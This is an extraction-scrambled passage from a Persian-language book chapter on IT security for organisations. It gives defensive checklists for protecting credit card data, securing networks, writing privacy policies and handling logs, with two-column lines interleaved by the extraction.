‫ﭘﺴﺮﺍﻥ‪ ،٢٠٢‬ﻭ ﻣﻚ ﮔﺮﻭﻫﻴﻞ‪ ٢٠٣‬ﻛﺘﺎﺑﻬﺎﻱ ﺧﻮﺑﻲ ﺩﺭ‬ ‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﺗﻤـﺎﻣﻲ ﻛﺎﺭﻣﻨـﺪﺍﻥ ‪-‬‬ ‫•‬
‫ﺑﺎﺏ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻣﻨﺘـﺸﺮ ﻛـﺮﺩﻩﺍﻧـﺪ‪.‬‬ ‫ﻣﺨﺼﻮﺻﹰﺎ ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ ‪ -‬ﺑﺎﻭﺭ ﺩﺍﺭﻧﺪ ﻛـﻪ ﺍﻣﻨﻴـﺖ‬
‫ﻗﻴﻤﺖ ﺍﻳﻦ ﻛﺘﺎﺑﻬﺎ ﺑﺴﺘﻪ ﺑـﻪ ﻣﺤـﻞ ﺯﻧـﺪﮔﻲ ﺷـﻤﺎ‬ ‫ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻥ ﺑﺴﻴﺎﺭ ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ‪.‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺘﻔﺎﻭﺕ ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﺑﻪ ﻫﺮ ﺣﺎﻝ ﺧﺮﻳـﺪ‬ ‫ﺍﮔﺮ ﺍﻃﻼﻋﺎﺗﻲ ﻣﺜﻞ ﺩﺍﺩﻩ ﻫـﺎﻱ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﻭ‬ ‫•‬
‫ﻭ ﺍﺳــﺘﻔﺎﺩﺓ ﻣــﺆﺛﺮ ﺍﺯ ﺁﻧﻬــﺎ ﺳــﺮﻣﺎﻳﻪﮔــﺬﺍﺭﻱ ﺑــﺴﻴﺎﺭ‬ ‫ﺩﻳﮕﺮ ﺩﺍﺩﻩﻫﺎﻱ ﻣـﺎﻟﻲ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺩﻳـﺴﻚ ﺳـﺨﺖ‬
‫ﻣﻔﻴﺪﻱ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ‪.‬‬ ‫ﺣﺬﻑ ﻣﻲ ﻛﻨﻴﺪ‪ ،‬ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺁﻥ ﺩﺍﺩﻩ ﺩﻳﮕـﺮ‬
‫ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﻗﺎﺑﻞ ﺑﺎﺯﻳﺎﺑﻲ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ‬
‫ﺏ( ﺍﮔﺮ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﻗﺎﺑـﻞ‬
‫ﻓﺮﺍﺗﺮ ﺍﺯ ﭘﺎﻙ ﻛﺮﺩﻥ ﺳﺎﺩﺓ ﻓﺎﻳﻠﻬـﺎ ﺍﺳـﺖ‪ .‬ﭼﻨﺎﻧﭽـﻪ‬
‫ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ‪:‬‬
‫ﻧﻤﻲﺩﺍﻧﻴﺪ ﻛﻪ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﭼﻄـﻮﺭ ﺑـﺼﻮﺭﺕ ﻛﺎﻣـﻞ ﺍﺯ‬
‫ﺗﻤﺎﻡ ﻧﻜﺎﺗﻲ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﻗﺒﻠﻲ ﮔﻔﺘﻪ ﺷـﺪ‪ ،‬ﺑﻌـﻼﻭﺓ‬ ‫•‬ ‫ﺑﻴﻦ ﺑﺒﺮﻳﺪ‪ ،‬ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺍﺯ ﺍﻓﺮﺍﺩ ﻣﺘﺨـﺼﺺ‬
‫ﻧﻜﺎﺕ ﺯﻳﺮ‪:‬‬ ‫ﻛﻤﻚ ﺑﮕﻴﺮﻳﺪ‪.‬‬
‫ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻧﺼﺐ ﻛﻨﻴﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﺪ‬ ‫•‬ ‫ﺩﺭ ﻓﻮﺍﺻﻞ ﻣﻨﻈﻢ ﺯﻣـﺎﻧﻲ ﻧـﺴﺨﺔ ﭘـﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ‬ ‫•‬
‫ﺗﻨﻬﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﻣﺠﺎﺯ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ‬ ‫ﻛﻨﻴﺪ ﻭ ﺍﺯ ﺍﻳﻤﻨﻲ ﻧﺴﺨﻪﻫﺎﻳﻲ ﻛﻪ ﺣﺎﻭﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺭﺍﻳﺎﻧــﻪ ﺩﺳﺘﺮﺳــﻲ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻨﺪ ﻭ ﺍﺯ ﺩﺳﺘﺮﺳــﻲ‬ ‫ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻫﺴﺘﻨﺪ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﻛﻨﻴﺪ‪.‬‬
‫ﻋﻤﻮﻣﻲ ﺑﻪ ﺁﻥ ﺟﻠﻮﮔﻴﺮﻱ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﺑﺎ ﺍﻧﺘـﺸﺎﺭ ﻳـﻚ "ﺳﻴﺎﺳـﺖ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ" ﺑـﻪ‬ ‫•‬
‫ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪﺭﻭﺯ ﺭﺍ ﺭﻭﻱ ﺗﻤـﺎﻡ ﺗﺠﻬﻴـﺰﺍﺕ‬ ‫•‬ ‫ﻛﺎﺭﺑﺮﺍﻥ ﺍﻋﻼﻡ ﻛﻨﻴﺪ ﭼﻪ ﺩﺍﺩﻩ ﻫﺎﻳﻲ ﺭﺍ ﺫﺧﻴـﺮﻩ ﻭ ﺍﺯ‬
‫ﺷﺒﻜﻪ )ﻣـﺴﻴﺮﻳﺎﺑﻬﺎ‪ ،‬ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ‪ ،‬ﺳـﻮﺋﻴﭽﻬﺎ‪ ،‬ﻭ ‪(...‬‬ ‫ﺁﻥ ﺑﺮﺍﻱ ﭼـﻪ ﻣﻨﻈـﻮﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤﺎﻳﻴـﺪ‪ ،‬ﻭ‬
‫ﻧﺼﺐ ﻛﻨﻴﺪ‪.‬‬ ‫ﭼﮕﻮﻧﻪ ﺁﻧﺮﺍ ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﺪ )ﻣﻲﺗﻮﺍﻧﻴﺪ‬
‫ﭼﮕﻮﻧﮕﻲ ﺣﻔﺎﻇﺖ ﺭﺍ ﺑﺼﻮﺭﺕ ﻏﻴﺮﻣﺴﺘﻘﻴﻢ ﻭ ﻣـﺒﻬﻢ ﺗﻮﺿـﻴﺢ‬
‫ﺑﺮﺍﻱ ﻛﻠﻴﺔ ﭘﻴﺎﻣﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻛـﻪ‬ ‫•‬
‫ﺩﻫﻴﺪ(‪.‬‬
‫ﺭﻭﻱ ﺧﻂ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﻧﺪ ﺍﺯ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻴﺪ‪.‬‬ ‫ﺍﮔﺮ ﺑﺮﺍﻱ ﺑﺮﺩﺍﺷﺖ ﺍﺯ ﻛﺎﺭﺗﻬـﺎﻱ ﺍﻋﺘﺒـﺎﺭﻱ‪ ،‬ﺍﻋﺘﺒـﺎﺭ‬ ‫•‬
‫ﺁﻧﻬﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﺑﺮﺧﻂ ﺍﺭﺯﻳﺎﺑﻲ ﻣﻲﻛﻨﻴـﺪ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﻫﻤــﺔ ﺧــﺪﻣﺎﺕ ﺷــﺒﻜﻪﺍﻱ ﻏﻴﺮﺿــﺮﻭﺭﻱ )ﻣﺜــﻞ‬ ‫•‬
‫ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ ‪ ،Web‬ﻓﺮﺍﺧــﻮﺍﻧﻲ ﺗــﺎﺑﻊ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪ ،٢٠٤‬ﻭ‬ ‫ﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬‫ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺧﻂ ﺍﺭﺗﺒـﺎﻃ ﹺ‬
‫ﭘﺮﻭﺗﻜﻞ ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻞ‪ (٢٠٥‬ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‪.‬‬ ‫ﺍﻣﻨﻴﺖ ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳـﺖ‪ .‬ﺍﮔـﺮ ﺍﺯ ﻳـﻚ ﻣـﻮﺩﻡ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻴـﺪ‪ ،‬ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﻦ ﻛـﻪ ﺍﻣﻜـﺎﻥ‬
‫ﺝ( ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﺔ‬ ‫ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺍﺯ ﺑﻴﺮﻭﻥ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪.‬‬
‫ﺟﻬﺎﻧﻲ ﻭﺏ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ‪:‬‬ ‫ﺍﮔﺮ ﺳﻮﺍﺑﻘﻲ ﺷﺎﻣﻞ ﺩﺍﺩﻩﻫﺎﻱ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺭﺍ ﺑـﻪ‬ ‫•‬
‫ﺗﻤﺎﻡ ﻧﻜﺎﺗﻲ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﻗﺒﻠﻲ ﮔﻔﺘﻪ ﺷـﺪ‪ ،‬ﺑﻌـﻼﻭﺓ‬ ‫•‬ ‫ﭼﺎﭖ ﻣﻲﺭﺳﺎﻧﻴﺪ‪ ،‬ﺍﺯ ﻟﺤﺎﻅ ﻓﻴﺰﻳﻜﻲ ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﻣﻨﻴﺖ‬
‫ﻧﻜﺎﺕ ﺯﻳﺮ‪:‬‬ ‫ﺁﻧﻬﺎ ﺭﺍ ﺗﺄﻣﻴﻦ ﻛﻨﻴﺪ ﻭ ﺑﻼﻓﺎﺻﻠﻪ ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺩﻳﮕﺮ‬
‫ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻧﺒﻮﺩﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎ ﺩﺳﺘﮕﺎﻩ ﻛﺎﻏﺬﺧﺮﺩﻛﻦ ﺍﺯ‬
‫ﺍﻃﻼﻋــﺎﺕ ﻣﺮﺑــﻮﻁ ﺑــﻪ ﻛــﺎﺭﺕ ﺍﻋﺘﺒــﺎﺭﻱ ﺭﺍ ﺩﺭ‬ ‫•‬
‫ﺑﻴﻦ ﺑﺒﺮﻳﺪ‪.‬‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ‬
‫ﻫﺴﺘﻨﺪ ﻗـﺮﺍﺭ ﻧﺪﻫﻴـﺪ‪ .‬ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺭﻭﻱ ﺩﺳـﺘﮕﺎﻫﻲ‬ ‫ﺍﺯ ﻣﻨﺎﺑﻊ ﻣﻌﺘﺒﺮ‪ ،‬ﭼﻨﺪ ﻛﺘﺎﺏ ﺑﻪﺭﻭﺯ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ‬ ‫•‬
‫ﺩﻳﮕﺮ ﻭ ﭘﺸﺖ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ ﻗـﺮﺍﺭ ﺩﻫﻴـﺪ ﻭ ﺑـﺮﺍﻱ‬ ‫ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺨﺮﻳﺪ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﻣـﻮﺭﺩ ﻣﻄﺎﻟﻌـﻪ‬
‫ﻗــﺮﺍﺭ ﺩﻫﻴــﺪ‪ ،‬ﻭ ﺗﻮﺻــﻴﻪﻫﺎﻳــﺸﺎﻥ ﺭﺍ ﺩﻧﺒــﺎﻝ ﻛﻨﻴــﺪ‪.‬‬
‫‪202‬‬ ‫‪John Wiley and Sons‬‬ ‫ﺍﻧﺘــﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠــﻲ ﻭ ﺷــﺮﻛﺎ‪ ،٢٠١‬ﺟــﺎﻥ ﻭﺍﻳﻠــﻲ ﻭ‬
‫‪203‬‬ ‫‪Osborne / McGraw-Hill‬‬
‫‪204‬‬ ‫)‪Remote Procedure Call (RPC‬‬
‫‪205‬‬ ‫)‪File Transfer Protocol (FTP‬‬ ‫‪201 O'Reilly & Associates‬‬
‫‪٢٠٩‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺑﺪﻭﻥ ﺍﺟﺎﺯﺓ ﺻﺮﻳﺢ ﻛـﺎﺭﺑﺮ‪ ،‬ﺁﺩﺭﺱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ‬ ‫•‬ ‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻥ ﺍﺯ ﻓﺮﺍﺧـﻮﺍﻧﻲ ﺗـﺎﺑﻊ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻳـﺎ‬
‫ﺍﻃﻼﻋﺎﺕ ﺷﺨـﺼﻲ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬ ‫ﺳﺎﻳﺮ ﺭﻭﺷﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺑﻪ ﻫﻤـﺮﺍﻩ ﻳـﻚ ﺳﻴـﺴﺘﻢ‬
‫ﺩﻳﮕﺮ ﻧﮕﺬﺍﺭﻳﺪ‪.‬‬ ‫ﻏﺮﺑﺎﻝﺳﺎﺯ ﺧﻮﺏ ﺩﺭ ﺳﻄﺢ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻴﺪ‪.‬‬
‫ﻫﺮﮔﺎﻩ ﻧﺎﻣﻪﺍﻱ ﺑﺮﺍﻱ ﺍﻓـﺮﺍﺩ ﺍﺭﺳـﺎﻝ ﻣـﻲﻛﻨﻴـﺪ‪ ،‬ﺑـﻪ ﺁﻧﻬـﺎ‬ ‫•‬
‫ﺗﻮﺿﻴﺢ ﺩﻫﻴﺪ ﻛﻪ ﺁﺩﺭﺱ ﭘﺴﺘﻲ ﺁﻧﻬـﺎ ﺭﺍ ﭼﮕﻮﻧـﻪ ﺑﺪﺳـﺖ‬ ‫ﺗﻤﺎﻡ ﺗﺮﺍﻛﻨـﺸﻬﺎﻱ ﺭﻭﻱ ﺷـﺒﻜﻪ ﺭﺍ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬ ‫•‬
‫ﺁﻭﺭﺩﻩﺍﻳــﺪ ﻭ ﺁﻧﻬــﺎ ﭼﮕﻮﻧــﻪ ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﺁﺩﺭﺱ ﺧــﻮﺩ ﺭﺍ ﺍﺯ‬ ‫ﻗﻮﻳﺘﺮﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻣﻮﺟﻮﺩ )ﺩﺭﺻـﻮﺭﺕ ﺍﻣﻜـﺎﻥ ﺑـﺎ‬
‫ﻓﻬﺮﺳﺖ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﮔﺎﻥ ﻧﺎﻣﻪﻫﺎﻱ ﺷﻤﺎ ﺣﺬﻑ ﻛﻨﻨﺪ‪.‬‬ ‫ﻛﻠﻴﺪ ‪ ۱۲۸‬ﺑﻴﺘﻲ( ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺩﺳﺘﺮﺱ ﻋﻤﻮﻡ ﻗـﺮﺍﺭ ﻧﺪﻫﻴـﺪ ﻭ‬ ‫•‬ ‫ﺍﻃﻤﻴﻨــﺎﻥ ﺣﺎﺻــﻞ ﻛﻨﻴــﺪ ﻛــﻪ ﺍﻃﻼﻋــﺎﺕ ﻛــﺎﺭﺕ‬ ‫•‬
‫ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﺁﻧﻬﺎ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﺪ‪.‬‬ ‫ﺍﻋﺘﺒﺎﺭﻱ ﻛﻪ ﻣﻮﻗﺘﹰﺎ ﺩﺭ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﺓ ﻭﺏ ﺫﺧﻴـﺮﻩ‬
‫ﺷﺪﻩ ﺍﺳﺖ‪ ،‬ﺑﻼﻓﺎﺻﻠﻪ ﭘﺲ ﺍﺯ ﺍﺗﻤﺎﻡ ﺗﺮﺍﻛﻨﺶ ﭘـﺎﻙ‬
‫ﺯﻣﺎﻧﻴﻜﻪ ﺩﻳﮕﺮ ﻧﻴﺎﺯﻱ ﺑﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ ﻧﺪﺍﺭﻳـﺪ‪ ،‬ﺁﻧﻬـﺎ ﺭﺍ‬ ‫•‬
‫ﻣﻲﺷﻮﺩ‪.‬‬
‫ﭘﺎﻙ ﻛﻨﻴﺪ‪.‬‬
‫ﺍﮔﺮ ﻻﺯﻡ ﺍﺳﺖ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ ﺑـﺮﺍﻱ ﻣـﺪﺕ ﺯﻳـﺎﺩﻱ ﺍﺯ‬ ‫•‬ ‫ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺣﺘﻤـ ﹰﺎ ﺑﺎﻳـﺪ ﺭﻭﻱ‬ ‫ﺩ(‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳـﻲ ﺑﺎﺷـﻨﺪ‪ ،‬ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ‬ ‫ﺭﺍﻳﺎﻧﺔ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪:‬‬
‫ﺑﺎﻋﺚ ﺷﻨﺎﺳﺎﻳﻲ ﺍﺷﺨﺎﺹ ﻣﻲﺷـﻮﺩ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺁﻥ ﺣـﺬﻑ‬
‫ﺗﻤﺎﻣﻲ ﻣﻮﺍﺭﺩ ﺑﺎﻻ ﺭﺍ ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ‪ ،‬ﺍﻣﺎ ﺑﺎ ﻫﻮﺷـﻴﺎﺭﻱ‬ ‫•‬
‫ﻛﻨﻴﺪ‪.‬‬
‫ﺑﻴﺸﺘﺮﻱ ﻧﺴﺒﺖ ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ‪ .‬ﺁﻥ ﺭﺍﻳﺎﻧـﻪ‪،‬‬
‫ﻧﺎﻗﻀﺎﻥ ﺳﻴﺎﺳﺖ ﺣﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﺭﺍ ﺗﺄﺩﻳـﺐ ﻳـﺎ ﺍﺧـﺮﺍﺝ‬ ‫•‬ ‫ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﺁﻥ‪ ،‬ﻭ ﮔﺰﺍﺭﺷـﻬﺎﻱ ﻓﻌﺎﻟﻴﺘﻬـﺎ ﺑﺎﻳـﺪ ﺑـﻪ‬
‫ﻧﻤﺎﻳﻴﺪ‪.‬‬ ‫ﺩﻗﺖ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺩﺍﺋﻤﻲ ﺑﺎﺷﻨﺪ‪.‬‬

‫ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ‪ISP‬ﻫﺎ‬ ‫ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ‬


‫ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﻧﺴﺒﺖ ﺑﻪ ﺁﻧﭽﻪ ﻛﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ‪ISP‬ﻫـﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺸﺘﺮﻱ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ‬
‫ﻣﻲﻛﻨﻨﺪ ﻣﻔﺼﻞﺗـﺮ ﺍﺳـﺖ‪ ،‬ﺍﻣـﺎ ﺑـﺴﻴﺎﺭ ﺍﻫﻤﻴـﺖ ﺩﺍﺭﺩ ﻛـﻪ ﻫﻤـﺔ‬
‫ﺩﺭ ﺍﻳﻨﺠﺎ ﻳﻚ ﺭﻭﺵ ﺳﺎﺩﻩ ﺍﻣﺎ ﻗﺎﺑﻞ ﺍﺟﺮﺍ ﺫﻛﺮ ﺷﺪﻩ ﻛـﻪ ﺁﻧـﺮﺍ ﺑـﻪ‬
‫ﮔﺰﻳﻨﻪﻫﺎ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﻭ ﺗﺼﻤﻴﻢ ﻋﺎﻗﻼﻧـﻪﺍﻱ ﺩﺭﺑـﺎﺭﺓ‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺑﻲ ﻛﻪ ﺑﻪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺍﻓﺮﺍﺩ ﺍﻫﻤﻴﺖ ﻣﻲﺩﻫﻨـﺪ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻧﻬﺎ ﺍﺗﺨﺎﺫ ﮔﺮﺩﺩ‪.‬‬
‫ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﻛﻨﻴﻢ‪ .‬ﺩﺭ ﺻـﻔﺤﺔ ﺍﻭﻝ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺧـﻮﺩ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﮔﺎﻫﻲ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﻳـﺎ ﺳـﺎﻳﺮ‬ ‫•‬ ‫ﺳﻴﺎﺳﺘﻬﺎﻳﺘﺎﻥ ﺩﺭ ﻗﺒﺎﻝ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺑﻪ ﺍﻓﺮﺍﺩ ﺗﻮﺿﻴﺢ ﺩﻫﻴﺪ‪ ،‬ﻭ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﺎﻟﻲ ﻣﺸﺘﺮﻱ ﺭﺍ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺗﻤﺎﻡ ﻗـﻮﺍﻧﻴﻦ‬ ‫ﺍﮔﺮ ﻧﻘﻄﺔ ﺍﺑﻬﺎﻣﻲ ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺎﺳﺘﻬﺎﻳﺘﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﺟﺎﺯﻩ ﺩﻫﻴـﺪ‬
‫ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﺑﺎﻳﺪ ﺍﻋﻤﺎﻝ ﺷﻮﻧﺪ‪.‬‬ ‫ﺷﺮﻛﺘﺘﺎﻥ ﺗﻮﺳﻂ ﻣﻤﻴﺰﻫﺎﻳﻲ ﺍﺯ ﺧﺎﺭﺝ ﺷﺮﻛﺖ ﻣﻮﺭﺩ ﺑﺎﺯﺑﻴﻨﻲ ﻗـﺮﺍﺭ‬
‫ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﺑﻲﺿﺎﺑﻄﻪ ﻳﺎ ﻛﻠﻴﺸﻪﺍﻱ ﻧﻴﺴﺖ‪.‬‬ ‫•‬
‫ﮔﻴﺮﺩ‪.‬‬
‫ﻣﻮﺿﻮﻋﺎﺕ ﻣﺨﺘﻠﻒ ﺭﺍ ﺩﺭﻙ ﻛﻨﻴﺪ ﻭ ﺑﺮﺍﻱ ﻫﺮﻳﻚ ﻃﺮﺣﻲ‬ ‫ﺟﻬــﺖ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﻳﮕــﺎﻩ ﻭﺏ‪ ،‬ﺍﺷــﺨﺎﺹ ﺭﺍ ﻣﻠــﺰﻡ ﺑــﻪ‬ ‫•‬
‫ﻛﻠﻲ ﺑﺮﻳﺰﻳﺪ‪.‬‬ ‫ﺛﺒﺖﻧﺎﻡ ﻭ ﻭﺭﻭﺩ ﺍﻃﻼﻋﺎﺕ ﺍﺿﺎﻓﻲ ﻧﻜﻨﻴﺪ‪.‬‬
‫ﻳﻚ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺗﺪﻭﻳﻦ ﻛﻨﻴﺪ ﺷـﺎﻣﻞ‪ :‬ﻣﻴـﺰﺍﻥ ﺗﻌﻬـﺪ‬ ‫•‬ ‫ﺍﮔﺮ ﻛﺎﺭﺑﺮﺍﻥ ﻋﻼﻗﻪ ﻣﻨﺪ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﺑﻮﻟﺘﻦ ﻫﺴﺘﻨﺪ‪ ،‬ﺍﺟـﺎﺯﻩ‬ ‫•‬
‫ﺷﻤﺎ ﺑﻪ ﻣﺤﺮﻣﺎﻧـﻪ ﻣﺎﻧـﺪﻥ ﺍﻃﻼﻋـﺎﺕ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ‬ ‫ﺩﻫﻴــﺪ ﻛــﻪ ﺑــﺮﺍﻱ ﺛﺒــﺖ ﻧــﺎﻡ ﺗﻨﻬــﺎ ﺍﺯ ﺁﺩﺭﺱ ﭘــﺴﺖ‬
‫ﻣﺸﺘﺮﻳﺎﻥ )ﺩﺭ ﻣﻘﺎﺑﻞ ﺩﺳﺘﺮﺳـﻲ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺧـﻮﺩ ﻳـﺎ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪.‬‬
